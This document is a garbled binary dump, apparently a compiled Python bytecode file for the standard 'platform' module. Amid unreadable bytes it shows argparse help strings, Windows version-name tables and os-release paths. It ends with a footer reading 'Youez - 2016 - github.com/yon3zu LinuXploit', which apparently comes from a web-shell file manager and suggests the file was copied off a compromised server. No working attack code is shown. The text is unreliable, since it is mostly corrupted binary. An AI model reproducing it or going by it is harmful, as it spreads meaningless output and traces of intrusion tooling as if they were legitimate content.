�B!�!	C�+C�,B>�>Cc�`�PrPr[O2[O2P!)zInvalidate the cached results.)r�r�r��clearr�r�r�r�invalidate_cachesrjs)���L����������r�c�J�U]6�cPgQ[[*P*-!�r�r�r_r )r�s"r�__annotate__�_parse_args.__annotate__xs��#�#�d�3�i�$�&�#r�c���]PHoUO2oUOQQQQ,Q5UOQQQQ	5UOQ
QQQ
Q5UOU2!)r�r�*�
nonaliasedr�)�nargs�choicesz--terse�
store_truezLreturn only the absolute minimum information needed to identify the platform)�action�helpz--nonaliasedr��store_falsez�disable system/OS name aliasing. If aliasing is enabled, some platforms report system names different from their common names, e.g. SunOS is reported as Solaris)�destrr
)�argparse�ArgumentParser�add_argument�
parse_args)rr�parsers&  r�_parse_argsrxs����
�
$�
$�
&�F�
����c�L�'�3J��K�
�����
'�	������
��
D��	����T�"�"r�c�J�U]6�cPgQ[[*P*-!rr)r�s"rr�_main.__annotate__�s��$�$��S�	�D� �$r�c���[U2oUO9%fQUO7oUO9%cQUO7o[	[V!22P!)r�r)rr�rr��printr/)rr�r�s&  r�_mainr�sM���t��D��J�J�0�0�7�d�i�i�/�E��l�l�>�>��D�I�I� =�G�	�(�7�
"�#r�c�d�UQ6Xc]QHGoUQQQ5Q![Q[8QU802g)�__version__)�_deprecated)�removez1.1.0zmodule z has no attribute )r]�)�warningsrr7rp)r�rs& r�__getattr__r!�s3���}��(��M�'�2��
�7�8�,�.@���I�
J�Jr��__main__)Nr�r�i@)r�)r�r�r�)rerfrg))��
r�r��post11))r$r�i�U�11)�r�r�r��10)�r�r]r�z8.1)�r�r�r��8)�r�r�r��7)�r�r�r�r�))�r�i��XP64)�r/r�r��XPMedia))r/r�r��XP)�r/r�r��2000))r#�post2025Server))r$r�i�e�
2025Server))r$r�i|O�
2022Server))r$r�icE�
2019Server)r'�
2016Server)r)�2012ServerR2)r*�
2012Server)r,�2008ServerR2)r.�
2008Server)r1�
2003Server)r4�
2000Server)r�r�r�r�)r�r�r�)rurvr�r�)r�r�r�F)r�r�r�r�r�F)r�r2)r�r)r�r4r)FF)z/etc/os-releasez/usr/lib/os-release)Ir��
__copyright__�collectionsr3rr.r�r�r�r��
frozendictrrrZrdr{r�r�r�r�r�r�r�r�r��
namedtupler�r�r�r�rr �	maketransr
rrrr*r7r9r<rKrMrzr|r�r�rur�rvrr�r�r�r�r�r�r�r�r�r�r�r�r/r�r�r�r�rrrr!rpr�r�r�<module>rFsV���v�
�*�	�	�
������	�2��R��b�
�B��R����"�d�B��#�s�C�	�	��� `0�D
�23$�l(�*����[�
�9*�v
(�)�,)�*�'�'��2���
@� �
#�
#��K�M�
�"F�N&$�V�
�
�k�;�?��7�"
�	� $�L#��
��_�	�=�$��� �N�N��R�K�\�8/�/�d+�)A�����-�/�)A�X��W�v�����
���f�P
��	/�������B�PD�����6$�.	�#�6$�K��z��	�G���Y)���D��s�E?�?F�F�F

Youez - 2016 - github.com/yon3zu
LinuXploit